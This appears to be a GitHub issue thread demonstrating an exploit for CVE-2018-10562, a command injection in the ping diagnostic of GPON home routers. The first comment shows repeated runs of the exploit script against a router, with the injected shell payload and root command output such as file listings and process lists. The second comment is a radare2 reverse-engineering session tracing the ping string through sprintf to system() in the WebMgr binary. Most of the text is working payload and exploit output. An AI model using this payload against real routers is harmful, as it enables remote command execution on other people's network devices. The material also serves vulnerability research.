[Exploit] CVE-2018-10562: GPON Home Routers RCE (command injection through the web ping diagnostic)
nixawk opened this issue · 1 comments
nixawk commented
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /"
INFO:__main__:sending payload: 127.0.0.1;`echo BGgw;ls /;echo BGgw`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BGgw
bin
boot
bootimg
dev
etc
home
include
initrd
lib
linuxrc
man
mnt
opt
proc
root
sbin
sys
tmp
uImage
usr
var
web
BGgw;
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /bin/"
INFO:__main__:sending payload: 127.0.0.1;`echo BMXr;ls /bin/;echo BMXr`;
diag_result = "ping -c 4 -s 64 127.0.0.1;BMXr
Console
EthMgr
GponCLI
GponSLID
LogMgr
MecMgr
MiscMgr
NetMgr
PonMgr
Ssp
TimerMgr
VmrMgr
WebMgr
ash
brctl
busybox
cat
catv
chgrp
chmod
chown
conntrack
cp
date
dd
df
dmesg
dnsmasq
dropbear
dsp
echo
egrep
false
fgrep
grep
gunzip
gzip
hostname
ip
ipaddr
iplink
iproute
iprule
iptables
iptables-restore
iptables-save
iptables-xml
iptunnel
kill
ln
ls
lsof
lspci
mReport
mkdir
mknod
mktemp
mount
mountpoint
mv
netstat
nice
ntpclient
pidof
ping
printenv
ps
pure-ftpd
pwd
rm
rmdir
sed
sh
sleep
stat
stty
sync
tar
tc
telnetd
touch
tr069Mgr
true
ttcp
umount
uname
usleep
vi
zcat
BMXr;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /sbin/"
INFO:__main__:sending payload: 127.0.0.1;`echo rXVS;ls /sbin/;echo rXVS`;
diag_result = "ping -c 4 -s 64 127.0.0.1;rXVS
arp
ath_wifi.sh
ath_wifi_aquila.sh
ez-ipupdate
fget
format
gdbnfs
halt
hostapd
ifconfig
ifrename
init
insmod
iwconfig
iwevent
iwgetid
iwlist
iwpriv
iwspy
logread
lsmod
memshow
modprobe
nbtscan
nfsstart
ntfs-3g
poweroff
pppd
pppoe
pppoe-config
pppoe-connect
pppoe-stop
reboot
repeater_pass_configuration
rg_setup.sh
rmmod
route
scsi_id
setup.sh
sysctl
syslogd
udev
udev_volume_id
udevd
udevsend
udevstart
udhcpc
upnpd
vconfig
wifi_cb
wifi_test
wlanconfig
wpatalk
rXVS;
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ps"
INFO:__main__:sending payload: 127.0.0.1;`echo TFGQ;ps;echo TFGQ`;
diag_result = "ping -c 4 -s 64 127.0.0.1;TFGQ
PID Uid VSZ Stat Command
1 root 1136 S init
2 root SWN [ksoftirqd/0]
3 root SW< [events/0]
4 root SW< [khelper]
5 root SW< [kthread]
20 root SW< [kblockd/0]
23 root SW< [khubd]
40 root SW [pdflush]
41 root SW [pdflush]
42 root SW< [kswapd0]
43 root SW< [aio/0]
79 root SW [mtdblockd]
183 root SWN [jffs2_gcd_mtd1]
187 root 1132 S syslogd
193 root 724 S < udevd
407 root SW< [voshwtimer/0]
470 root 2116 S /bin/GponCLI
473 root 1808 S /bin/telnetd
476 root 1288 S /bin/dropbear
477 root 2116 S /bin/GponCLI --script
478 root 2116 S /bin/GponCLI --hook
479 root 1832 S Ssp
480 root 1832 S Ssp
481 root 1832 S < Ssp
482 root 1856 S < /bin/TimerMgr -p 10 -s 0
483 root 1856 S < /bin/TimerMgr -p 10 -s 0
484 root 1856 S < /bin/TimerMgr -p 10 -s 0
485 root 2836 S /bin/LogMgr -p 20 -s 0
486 root 2300 S /bin/MiscMgr -p 20 -s 0
496 root 3624 S /bin/PonMgr -p 20 -s 0
497 root 2308 S /bin/NetMgr -p 20 -s 0
550 root 3604 S < /bin/VmrMgr -p 10 -s 0
551 root 3604 S < /bin/VmrMgr -p 10 -s 0
552 root 3604 S < /bin/VmrMgr -p 10 -s 0
553 root 3968 S /bin/EthMgr -p 20 -s 0
554 root 6360 S /bin/tr069Mgr -p 20 -s 0
573 root 6360 S /bin/tr069Mgr -p 20 -s 0
574 root 6360 S < /bin/tr069Mgr -p 20 -s 0
575 root 6360 S < /bin/tr069Mgr -p 20 -s 0
576 root 6360 S < /bin/tr069Mgr -p 20 -s 0
577 root 2332 S /bin/WebMgr -p 20 -s 0
580 root 6336 S /bin/MecMgr -p 20 -s 0
607 root 3624 D /bin/PonMgr -p 20 -s 0
608 root 3624 S /bin/PonMgr -p 20 -s 0
609 root 3624 D < /bin/PonMgr -p 20 -s 0
684 root 2308 S /bin/NetMgr -p 20 -s 0
685 root 2308 S /bin/NetMgr -p 20 -s 0
692 root 3604 S < /bin/VmrMgr -p 10 -s 0
695 root SW< [voip isr/0]
698 root 3604 S < /bin/VmrMgr -p 10 -s 0
701 root SW< [TAPIevents/0]
709 root SW [TAPIdxt_int]
711 root 3604 S < /bin/VmrMgr -p 10 -s 0
720 root 6336 S /bin/MecMgr -p 20 -s 0
722 root SW< [brdg_wkq/0]
996 root 1140 S /bin/sh /sbin/pppoe-connect 0
1005 root 1412 S /sbin/pppd pty /sbin/pppoe -p /var/run/pppoe0.pid.ppp
1006 root 1132 S sh -c /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan
1007 nobody 600 S /sbin/pppoe -p /var/run/pppoe0.pid.pppoe -I wan0 -T 8
1032 nobody 812 S dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
1033 root 800 S dnsmasq -6 /bin/mReport -C /tmp/dnsmasq.cfg -K
1216 root 1320 S upnpd ppp0 br0
1217 root 1320 S upnpd ppp0 br0
1218 root 1320 S upnpd ppp0 br0
1220 root 1320 S upnpd ppp0 br0
1221 root 1320 S upnpd ppp0 br0
1222 root 1320 S upnpd ppp0 br0
1224 root 1320 S upnpd ppp0 br0
1226 root 1320 S upnpd ppp0 br0
1228 root 1320 S upnpd ppp0 br0
1229 root 1320 S upnpd ppp0 br0
1315 root 1240 S hostapd -B /tmp/hostapd.conf
6834 root 2332 S /bin/WebMgr -p 20 -s 0
8360 root 2332 S /bin/WebMgr -p 20 -s 0
8363 root 1132 S sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
8364 root 1132 S sh -c echo "ping -c 4 -s 64 127.0.0.1;`echo TFGQ;ps;e
8365 root 1136 R ps
TFGQ;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/"
INFO:__main__:sending payload: 127.0.0.1;`echo Rbfg;ls /web/;echo Rbfg`;
diag_result = "ping -c 4 -s 64 127.0.0.1;Rbfg
html
Rbfg;
";
$ py3 exploit-CVE-2018-10562.py http://192.168.1.100:8080/ "ls /web/html/"
INFO:__main__:sending payload: 127.0.0.1;`echo dZad;ls /web/html/;echo dZad`;
diag_result = "ping -c 4 -s 64 127.0.0.1;dZad
backup.html
ddns.html
devinfo.html
diag.html
dmz_alg.html
dns_host.html
download
error.html
firewall.html
images
index.html
init.html
ip_filter.html
lan.html
landev.html
language.html
laninfo.html
log.html
login.html
login_spa.html
logo.html
logout.html
mac_filter.html
menu.html
nat.html
nat_portforwarding.html
ntp.html
password.html
poninfo.html
reboot.html
rebooting.html
route.html
script
slid.html
style
tab.html
template
tr069.html
upgrade.html
upnp.html
usb.html
wan.html
waninfo.html
wifi.html
dZad;
";
nixawk commented
root@labs:~/CVE-2018-10562# radare2 WebMgr
[0x000098e8]> i;il;
blksz 0x0
block 0x100
fd 5
file WebMgr
format elf
iorw true
mode rw-
size 0x708
humansz 1.8K
type EXEC (Executable file)
arch arm
binsz 132806
bintype elf
bits 32
canary false
class ELF32
crypto false
endian little
havecode true
intrp /lib/ld-uClibc.so.0
lang c
linenum false
lsyms false
machine ARM
maxopsz 4
minopsz 4
nx false
os linux
pcalign 4
pic false
relocs false
relro no
rpath NONE
static false
stripped true
subsys linux
va true
[Linked libraries]
libvos.so
libmib.so
libpthread.so.0
libm.so.0
libWebs.so
libc.so.0
6 libraries
[0x00009870]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[ ]
[Value from 0x00008000 to 0x000279b4
aav: 0x00008000-0x000279b4 in 0x8000-0x279b4
aav: 0x00008000-0x000279b4 in 0x28000-0x289f8
Value from 0x00028000 to 0x000289f8
aav: 0x00028000-0x000289f8 in 0x8000-0x279b4
aav: 0x00028000-0x000289f8 in 0x28000-0x289f8
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[0x00009870]> afl
0x000093f0 1 16 sym._init
0x00009414 1 12 sym.imp.websSetDefaultDir
0x00009420 1 12 sym.imp.websWrite
0x0000942c 1 12 sym.imp.websSSLClose
0x00009438 1 12 sym.imp.inet_aton
0x00009444 1 12 sym.imp.fwrite
0x00009450 1 12 sym.imp.system
0x0000945c 1 12 sym.imp.usleep
0x00009468 1 12 sym.imp.VOS_SendMsg
0x00009474 1 12 sym.imp.memcpy
0x00009480 1 12 sym.imp.webs_get_uptime
0x0000948c 1 12 sym.imp.net_check_ipv6_prefix
0x00009498 1 12 sym.imp.websAspDefine
0x000094a4 1 12 sym.imp.getsockname
0x000094b0 1 12 sym.imp.strcat
0x000094bc 1 12 sym.imp.VOS_Hex2Binary
0x000094c8 1 12 sym.imp.getcwd
0x000094d4 1 12 sym.imp.getnameinfo
0x000094e0 1 12 sym.imp.strcasecmp
0x000094ec 1 12 sym.imp.strrchr
0x000094f8 1 12 sym.imp.websHeader
0x00009504 1 12 sym.imp.strncmp
0x00009510 1 12 sym.imp.ascToUni
0x0000951c 1 12 sym.imp.__uClibc_main
0x00009528 1 12 sym.imp.inet_pton
0x00009534 1 12 sym.imp.websRedirect
0x00009540 1 12 sym.imp.VOS_Host2Str
0x0000954c 1 12 sym.imp.strlen
0x00009558 1 12 sym.imp.websRedirectFirstHttp
0x00009564 1 12 sym.imp.LOG_Open
0x00009570 1 12 sym.imp.VOS_SendSyncMsg
0x0000957c 1 12 sym.imp.VOS_ExecStr
0x00009588 1 12 sym.imp.websFormHandler
0x00009594 1 12 sym.imp.websSSLOpen
0x000095a0 1 12 sym.imp.VOS_StopTimer
0x000095ac 1 12 sym.imp.bopen
0x000095b8 1 12 sym.imp.websGetDefaultDir
0x000095c4 1 12 sym.imp.fclose
0x000095d0 1 12 sym.imp.fread
0x000095dc 1 12 sym.imp.VOS_AppStart
0x000095e8 1 12 sym.imp.fopen
0x000095f4 1 12 sym.imp.VOS_Str2Host
0x00009600 1 12 sym.imp.websFormDefine
0x0000960c 1 12 sym.imp.getpeername
0x00009618 1 12 sym.imp.VOS_CfgParamGetByName
0x00009624 1 12 sym.imp.websDefaultHandler
0x00009630 1 12 sym.imp.websUrlHandlerDefine
0x0000963c 1 12 sym.imp.VOS_NewIpv6GetHostByName
0x00009648 1 12 sym.imp.VOS_E8C_Log
0x00009654 1 12 sym.imp.VOS_NewGetHostByName
0x00009660 1 12 sym.imp.VOS_SpawnTask
0x0000966c 1 12 sym.imp.websFooter
0x00009678 1 12 sym.imp.socketSelect
0x00009684 1 12 sym.imp.tempnam
0x00009690 1 12 sym.imp.fgets
0x0000969c 1 12 sym.imp.socketPtr
0x000096a8 1 12 sym.imp.strncpy
0x000096b4 1 12 sym.imp.websOpenServer
0x000096c0 1 12 sym.imp.socketReady
0x000096cc 1 12 sym.imp.websSetHost
0x000096d8 1 12 sym.imp.fputs
0x000096e4 1 12 sym.imp.websGetVar
0x000096f0 1 12 sym.imp.unlink
0x000096fc 1 12 sym.imp.memset
0x00009708 1 12 sym.imp.VOS_Base64Decode
0x00009714 1 12 sym.imp.inet_ntoa
0x00009720 1 12 sym.imp.emfSchedProcess
0x0000972c 1 12 sym.imp.VOS_Ntohl
0x00009738 1 12 sym.imp.VOS_ResponseSyncMsg
0x00009744 1 12 sym.imp.inet_addr
0x00009750 1 12 sym.imp.abort
0x0000975c 1 12 sym.imp.memcmp
0x00009768 1 12 sym.imp.sprintf
0x00009774 1 12 sym.imp.LOG_Print
0x00009780 1 12 sym.imp.websSetIpaddr
0x0000978c 1 12 sym.imp.bstrdup
0x00009798 1 12 sym.imp.__aeabi_idivmod
0x000097a4 1 12 sym.imp.VOS_Binary2Hex
0x000097b0 1 12 sym.imp.VOS_StartTimer
0x000097bc 1 12 sym.imp.VOS_RegLoopHandler
0x000097c8 1 12 sym.imp.strstr
0x000097d4 1 12 sym.imp.strcmp
0x000097e0 1 12 sym.imp.socketProcess
0x000097ec 1 12 sym.imp.VOS_AppInit
0x000097f8 1 12 sym.imp.socketOpen
0x00009804 1 12 sym.imp.websDone
0x00009810 1 12 sym.imp.free
0x0000981c 1 12 sym.imp.atoi
0x00009828 1 12 sym.imp.strchr
0x00009834 1 12 sym.imp.puts
0x00009840 1 12 sym.imp.signal
0x0000984c 1 12 sym.imp.inet_ntop
0x00009858 1 12 sym.imp.VOS_CheckFileImgCRC
0x00009864 1 12 sym.imp.strcpy
0x00009870 1 44 entry0
0x000098e8 1 24 entry2.fini
0x00009904 4 48 entry1.init
0x00009958 1 16 sym.defaultErrorHandler
0x00009968 1 16 sym.defaultTraceHandler
0x000099c8 1 52 main
0x00009a0c 3 104 sub.LOG_Print_a0c
0x00009a88 4 120 sub.LOG_Print_a88
0x00009b14 1 156 sub.memset_b14
0x00009bc8 4 188 sym.IsLanIpaddr
0x00009c98 1 220 sub.websWrite_c98
0x00009db0 1 40 fcn.00009db0
0x00009ef8 7 548 sub.bopen_ef8
0x0000a224 9 132 sub.socketPtr_224
0x0000a2a8 51 1024 sym.webLoginCheck
0x0000a778 14 356 sub.socketPtr_778
0x0000a8ec 14 500 sym.websDoRedirectFirstHttp
0x0000ad7c 12 184 sub.__aeabi_idivmod_d7c
0x0000ae34 1 272 -> 300 sub.websAspDefine_e34
0x0000af8c 7 148 sub.fopen_f8c
0x0000b478 6 156 sub.websGetDefaultDir_478
0x0000b6ec 1 220 sub.websWrite_6ec
0x0000b804 6 168 sub.webs_get_uptime_804
0x0000b8c0 5 148 sub.memset_8c0
0x0000ba38 1 40 sub.websAspDefine_a38
0x0000bafc 1 60 sub.websAspDefine_afc
0x0000c0c0 1 60 sub.websAspDefine_c0
0x0000c7d8 1 60 sub.websAspDefine_7d8
0x0000c97c 7 508 sub.memset_97c
0x0000ccbc 1 72 sub.websAspDefine_cbc
0x0000d190 1 60 sub.websAspDefine_190
0x0000d1e0 1 60 sub.websAspDefine_1e0
0x0000d230 1 60 sub.websAspDefine_230
0x0000d280 1 60 sub.websAspDefine_280
0x0000dcfc 10 268 sub.memset_cfc
0x0000dfe8 23 900 sub.memset_fe8
0x0000e4e4 10 388 sub.memset_4e4
0x0000e82c 1 40 sub.websAspDefine_82c
0x0000e864 35 1364 sub.memset_864
0x0000f5ec 1 120 sub.websAspDefine_5ec
0x00011620 1 64 sub.websAspDefine_620
0x00011f20 1 72 sub.websAspDefine_f20
0x00012cc0 1 88 sub.websAspDefine_cc0
0x00014aec 1 120 sub.websAspDefine_aec
0x0001601c 1 64 sub.websAspDefine_1c
0x000165a8 1 52 sub.websAspDefine_5a8
0x00017d0c 1 40 sub.websAspDefine_d0c
0x00018120 1 52 sub.websAspDefine_120
0x00018a78 1 60 sub.websAspDefine_a78
0x00018ca4 1 60 sub.websAspDefine_ca4
0x00019098 1 60 sub.websAspDefine_98
0x0001963c 1 60 sub.websAspDefine_63c
0x00019a00 1 72 sub.websAspDefine_a00
0x0001a340 1 60 sub.websAspDefine_340
0x0001ad88 1 28 fcn.0001ad88
0x0001af90 1 100 sub.websAspDefine_f90
0x0001c304 1 132 sub.websAspDefine_304
0x0001d778 1 40 sub.websAspDefine_778
0x0001da40 1 40 sub.websAspDefine_a40
0x0001ddf4 1 60 sub.websAspDefine_df4
0x0001e230 1 60 sub.websAspDefine_230
0x0001e48c 1 88 sub.websFormDefine_48c
0x0001ee88 1 40 sub.websAspDefine_e88
0x0001eec0 3 124 sub.VOS_SendSyncMsg_ec0
0x0001f0e0 1 60 sub.websAspDefine_e0
0x0001f8a0 1 28 loc.0001f8a0
0x0001fa98 1 40 sub.websAspDefine_a98
0x0001fef4 1 16 sym._fini
[0x00009870]> / ping
Searching 4 bytes in [0x8000-0x279b4]
hits: 14
Searching 4 bytes in [0x28000-0x289f8]
hits: 0
0x00024407 hit0_0 .ailPortmapping rules max.ADD.
0x00024482 hit0_1 .No portmapping rule.DEL_po.
0x000246e0 hit0_2 .wan_list[%d].mapping_list_count = %d.
0x00024708 hit0_3 .wan_list[%d].mapping_list = new Arra.
0x00024738 hit0_4 .wan_list[%d].mapping_list[%d]='%s';.
0x0002526e hit0_5 .fail snooping_enable="%d";.
0x000252ac hit0_6 .igmpsnoopingenableproxyena.
0x00025f58 hit0_7 .diagshowpingtracert255.
0x000260d7 hit0_8 .secho "ping6 -I %s -c 4 %s.
0x000260f8 hit0_9 .%s" >> %sping6 -I %s -c 4 %s .
0x00026121 hit0_10 . 2>&1echo "No ping test." > %s.
0x000261ff hit0_11 . %secho "ping -c 4 %s" >> %s.
0x00026218 hit0_12 . %s" >> %sping -c 4 %s -I %s 1.
0x0002628f hit0_13 . 2>&1echo "ping/traceroute fini.
[0x00009870]> pd @ 0x000261ff
;-- hit0_11:
0x000261ff 70 unaligned
0x00026200 696e6720 rsbhs r6, r7, sb, ror 28
0x00026204 2d632034 strtlo r6, [r0], -0x32d
,=< 0x00026208 2025730a beq 0x1cef690
| 0x0002620c 22203e3e invalid
| 0x00026210 20257300 rsbseq r2, r3, r0, lsr 10
| 0x00026214 00000000 andeq r0, r0, r0
| ;-- str.ping__c_4__s__I__s_1___s_2__1:
| ;-- hit0_12:
| ; UNKNOWN XREF from 0x0001aafc (aav.0x0001a684 + 1144)
| 0x00026218 .string "ping -c 4 %s -I %s 1>>%s 2>&1" ; len=30
| 0x00026236 0000 unaligned
| 0x00026237 00 unaligned
| ;-- str.echo____traceroute__n__I__s________s:
| ; UNKNOWN XREF from 0x0001ab00 (aav.0x0001a684 + 1148)
| 0x00026238 .string "echo \"\ntraceroute -n -I %s\n\" >> %s" ; len=35
| 0x0002625b 00 unaligned
| 0x0002625c 00000000 andeq r0, r0, r0
| ;-- str.traceroute__n__I__s__s__s_1___s_2__1:
| ; UNKNOWN XREF from 0x0001ab04 (aav.0x0001a684 + 1152)
| 0x00026260 .string "traceroute -n -I %s -s %s 1>>%s 2>&1" ; len=37
| 0x00026285 000000 unaligned
| 0x00026286 0000 unaligned
| 0x00026287 00 unaligned
| ;-- str.echo__ping_traceroute_finished.________s:
| ; UNKNOWN XREF from 0x0001ab0c (aav.0x0001a684 + 1160)
| 0x00026288 .string "\necho \"ping/traceroute finished.\n\" >> %s" ; len=41
| ;-- hit0_13:
| 0x0002628f 70 unaligned
| 0x00026290 696e672f svchs 0x676e69
| 0x00026294 74726163 invalid
| 0x00026298 65726f75 strbvc r7, [0x0002603b]!
| 0x0002629c 74652066 qsub16vs r6, r0, r4
| 0x000262a0 696e6973 invalid
| 0x000262a4 6865642e invalid
| 0x000262a8 0a22203e invalid
| 0x000262ac 3e202573 invalid
| 0x000262b0 00000000 andeq r0, r0, r0
| 0x000262b4 00000000 andeq r0, r0, r0
| ;-- str.diag_state_____d:
| ; UNKNOWN XREF from 0x0001ad5c (aav.0x0001ab10 + 588)
| 0x000262b8 .string "diag_state = %d;\n" ; len=19
| 0x000262cb 00 unaligned
| 0x000262cc 00000000 andeq r0, r0, r0
| ;-- str.diag_result:
| ; UNKNOWN XREF from 0x0001ad7c (aav.0x0001ab10 + 620)
| 0x000262d0 .string "diag_result = \"" ; len=16
| ;-- str.Tr069Info_GetConfig:
| ; UNKNOWN XREF from 0x0001ada4 (fcn.0001ad88 + 28)
| 0x000262e0 .string "Tr069Info_GetConfig" ; len=20
| 0x000262f4 00000000 andeq r0, r0, r0
| ;-- str.home_rongweilun_svn_gemocean_release_SWOntR4152B018_160621_0100277_src_app_web_src_web_tr069info.c:
| ; UNKNOWN XREF from 0x0001aea8 (sub.VOS_SendSyncMsg_dac + 252)
| ; UNKNOWN XREF from 0x0001af8c (aav.0x0001aeac + 224)
| 0x000262f8 .string "/home/rongweilun/svn/gemocean/release/SWOntR4152B018_160621_0100277/src/app/web/src/web_tr069info.c" ; len=100
| 0x0002635c 00000000 andeq r0, r0, r0
| ;-- str.Tr069WanConnect__d_____d:
| ; UNKNOWN XREF from 0x0001af78 (aav.0x0001aeac + 204)
| 0x00026360 .string "Tr069WanConnect[%d] = %d; \n" ; len=28
| 0x0002637c 00000000 andeq r0, r0, r0
| ;-- str.web_get_cfg_send_syc_message_fail:
| ; UNKNOWN XREF from 0x0001af88 (aav.0x0001aeac + 220)
| 0x00026380 .string "web get cfg send syc message fail" ; len=34
| 0x000263a2 0000 unaligned
| 0x000263a3 00 unaligned
| 0x000263a4 00000000 andeq r0, r0, r0
| ;-- str.Device_GetConfig:
| ; UNKNOWN XREF from 0x0001aff8 (sub.websAspDefine_f90 + 104)
| 0x000263a8 .string "Device_GetConfig" ; len=17
| 0x000263b9 000000 unaligned
| 0x000263ba 0000 unaligned
| 0x000263bb 00 unaligned
| 0x000263bc 00000000 andeq r0, r0, r0
| ;-- str.device_Form:
| ; UNKNOWN XREF from 0x0001b000 (sub.websAspDefine_f90 + 112)
| 0x000263c0 .string "device_Form" ; len=12
| 0x000263cc 00000000 andeq r0, r0, r0
| ;-- str.usb_restore_Form:
| ; UNKNOWN XREF from 0x0001b008 (sub.websAspDefine_f90 + 120)
| 0x000263d0 .string "usb_restore_Form" ; len=17
| 0x000263e1 000000 unaligned
| 0x000263e2 0000 unaligned
| 0x000263e3 00 unaligned
| 0x000263e4 00000000 andeq r0, r0, r0
| ;-- str.init_XForm:
| ; UNKNOWN XREF from 0x0001b010 (sub.websAspDefine_f90 + 128)
| 0x000263e8 .string "init_XForm" ; len=11
| 0x000263f3 00 unaligned
| 0x000263f4 00000000 andeq r0, r0, r0
| ;-- str.reboot_XForm:
| ; UNKNOWN XREF from 0x0001b018 (sub.websAspDefine_f90 + 136)
| 0x000263f8 .string "reboot_XForm" ; len=13
| 0x00026405 000000 unaligned
| 0x00026406 0000 unaligned
| 0x00026407 00 unaligned
| ;-- str.backup_XForm:
| ; UNKNOWN XREF from 0x0001b020 (sub.websAspDefine_f90 + 144)
| 0x00026408 .string "backup_XForm" ; len=13
| 0x00026415 000000 unaligned
[0x00009870]> pd @ 0x0001aafc
; DATA XREF from 0x0001a9c0 (aav.0x0001a684 + 828)
0x0001aafc .dword 0x00026218 ; str.ping__c_4__s__I__s_1___s_2__1 ; hit0_12
; DATA XREF from 0x0001aa18 (aav.0x0001a684 + 916)
0x0001ab00 .dword 0x00026238 ; str.echo____traceroute__n__I__s________s
; DATA XREF from 0x0001aa3c (aav.0x0001a684 + 952)
0x0001ab04 .dword 0x00026260 ; str.traceroute__n__I__s__s__s_1___s_2__1
; DATA XREF from 0x0001aa60 (aav.0x0001a684 + 988)
0x0001ab08 .dword 0x00026198 ; str.echo__No_traceroute_test.__________s
; DATA XREF from 0x0001aa74 (aav.0x0001a684 + 1008)
0x0001ab0c .dword 0x00026288 ; str.echo__ping_traceroute_finished.________s
;-- aav.0x0001ab10:
; UNKNOWN XREF from 0x0001a380 (sub.websAspDefine_340 + 64)
0x0001ab10 0dc0a0e1 mov ip, sp
0x0001ab14 f0df2de9 push {r4, r5, r6, r7, r8, sb, sl, fp, ip, lr, pc}
0x0001ab18 04b04ce2 sub fp, ip, 4
0x0001ab1c 34429fe5 ldr r4, aav.0x00028670 ; [0x1ad58:4]=0x28670 aav.0x00028670
0x0001ab20 01da4de2 sub sp, sp, 0x1000
0x0001ab24 825e4be2 sub r5, fp, 0x820
0x0001ab28 0cd04de2 sub sp, sp, 0xc
0x0001ab2c 0c5045e2 sub r5, r5, 0xc
0x0001ab30 0190a0e1 mov sb, r1
0x0001ab34 022ba0e3 mov r2, 0x800 ; 2048
0x0001ab38 0010a0e3 mov r1, 0
0x0001ab3c 0500a0e1 mov r0, r5
0x0001ab40 edbaffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
0x0001ab44 0900a0e1 mov r0, sb
0x0001ab48 0c129fe5 ldr r1, str.diag_state_____d ; [0x1ad5c:4]=0x262b8 str.diag_state_____d
0x0001ab4c 002094e5 ldr r2, [r4]
0x0001ab50 32baffeb bl sym.imp.websWrite
0x0001ab54 013a4be2 sub r3, fp, 0x1000
0x0001ab58 300003e5 str r0, [r3, -0x30]
0x0001ab5c 003094e5 ldr r3, [r4]
0x0001ab60 020053e3 cmp r3, 2 ; 2
,=< 0x0001ab64 1b00001a bne 0x1abd8
| 0x0001ab68 f0019fe5 ldr r0, str.tmp_.web_diag.txt ; [0x1ad60:4]=0x26020 str.tmp_.web_diag.txt
| 0x0001ab6c f0119fe5 ldr r1, aav.0x000255b0 ; [0x1ad64:4]=0x255b0 aav.0x000255b0
| 0x0001ab70 9cbaffeb bl sym.imp.fopen ; file*fopen(const char *filename,
| 0x0001ab74 004050e2 subs r4, r0, 0
,==< 0x0001ab78 0600000a beq 0x1ab98
|| 0x0001ab7c 0500a0e1 mov r0, r5
|| 0x0001ab80 e0119fe5 ldr r1, [0x0001ad68] ; [0x1ad68:4]=0x7ff
|| 0x0001ab84 0120a0e3 mov r2, 1 ; 1
|| 0x0001ab88 0430a0e1 mov r3, r4
|| 0x0001ab8c 8fbaffeb bl sym.imp.fread ; size_t fread(void *ptr, FILE *stream)
|| 0x0001ab90 0400a0e1 mov r0, r4
|| 0x0001ab94 8abaffeb bl sym.imp.fclose ; int fclose(FILE *stream)
|| ; JMP XREF from 0x0001ab78 (aav.0x0001ab10 + 104)
`--> 0x0001ab98 cc319fe5 ldr r3, aav.0x00028674 ; [0x1ad6c:4]=0x28674 aav.0x00028674
| 0x0001ab9c 0040a0e3 mov r4, 0
| 0x0001aba0 0410a0e1 mov r1, r4
| 0x0001aba4 004083e5 str r4, [r3]
| 0x0001aba8 4020a0e3 mov r2, 0x40 ; '@' ; 64
| 0x0001abac bc019fe5 ldr r0, aav.0x00028678 ; [0x1ad70:4]=0x28678 aav.0x00028678
| 0x0001abb0 d1baffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
| 0x0001abb4 0410a0e1 mov r1, r4
| 0x0001abb8 2020a0e3 mov r2, 0x20 ; 32
| 0x0001abbc b0019fe5 ldr r0, aav.0x000286f8 ; [0x1ad74:4]=0x286f8 aav.0x000286f8
| 0x0001abc0 cdbaffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
| 0x0001abc4 0410a0e1 mov r1, r4
| 0x0001abc8 1f2ea0e3 mov r2, 0x1f0 ; 496
| 0x0001abcc a4019fe5 ldr r0, aav.0x00028718 ; [0x1ad78:4]=0x28718 aav.0x00028718
| 0x0001abd0 c9baffeb bl sym.imp.memset ; void *memset(void *s, int c, size_t n)
,==< 0x0001abd4 0b0000ea b 0x1ac08
|| ; JMP XREF from 0x0001ab64 (aav.0x0001ab10 + 84)
|`-> 0x0001abd8 80019fe5 ldr r0, str.tmp_.web_diag.txt ; [0x1ad60:4]=0x26020 str.tmp_.web_diag.txt
| 0x0001abdc 80119fe5 ldr r1, aav.0x000255b0 ; [0x1ad64:4]=0x255b0 aav.0x000255b0
| 0x0001abe0 80baffeb bl sym.imp.fopen ; file*fopen(const char *filename,
| 0x0001abe4 004050e2 subs r4, r0, 0
|,=< 0x0001abe8 0600000a beq 0x1ac08
|| 0x0001abec 0500a0e1 mov r0, r5
|| 0x0001abf0 70119fe5 ldr r1, [0x0001ad68] ; [0x1ad68:4]=0x7ff
|| 0x0001abf4 0120a0e3 mov r2, 1 ; 1
|| 0x0001abf8 0430a0e1 mov r3, r4
[0x00009870]> pd @ 0x0001a9c0
0x0001a9c0 34119fe5 ldr r1, str.ping__c_4__s__I__s_1___s_2__1 ; [0x1aafc:4]=0x26218 hit0_12
0x0001a9c4 0030a0e1 mov r3, r0
0x0001a9c8 e8209fe5 ldr r2, aav.0x000286b8 ; [0x1aab8:4]=0x286b8 aav.0x000286b8
0x0001a9cc 0400a0e1 mov r0, r4
0x0001a9d0 00508de5 str r5, [sp]
0x0001a9d4 63bbffeb bl sym.imp.sprintf ; int sprintf(char *s,
,=< 0x0001a9d8 030000ea b 0x1a9ec
| ; JMP XREF from 0x0001a990 (aav.0x0001a684 + 780)
| 0x0001a9dc 0520a0e1 mov r2, r5
| 0x0001a9e0 0400a0e1 mov r0, r4
| 0x0001a9e4 f8109fe5 ldr r1, str.echo__No_ping_test._________s ; [0x1aae4:4]=0x26118 str.echo__No_ping_test._________s
| 0x0001a9e8 5ebbffeb bl sym.imp.sprintf ; int sprintf(char *s,
| ; JMP XREF from 0x0001a9d8 (aav.0x0001a684 + 852)
`-> 0x0001a9ec 0400a0e1 mov r0, r4
0x0001a9f0 96baffeb bl sym.imp.system ; int system(const char *string)
0x0001a9f4 d8009fe5 ldr r0, aav.0x000286f8 ; [0x1aad4:4]=0x286f8 aav.0x000286f8
0x0001a9f8 e8109fe5 ldr r1, str.tracert ; [0x1aae8:4]=0x25f60 str.tracert
0x0001a9fc 71bbffeb bl sym.imp.strstr ; char*strstr(char *s1, const char *s2)
0x0001aa00 000050e3 cmp r0, 0
0x0001aa04 664f4be2 sub r4, fp, 0x198
0x0001aa08 94509fe5 ldr r5, str.tmp_.web_diag.txt ; [0x1aaa4:4]=0x26020 str.tmp_.web_diag.txt
,=< 0x0001aa0c 1100000a beq 0x1aa58
| 0x0001aa10 9c209fe5 ldr r2, aav.0x00028678 ; [0x1aab4:4]=0x28678 aav.0x00028678
| 0x0001aa14 0530a0e1 mov r3, r5
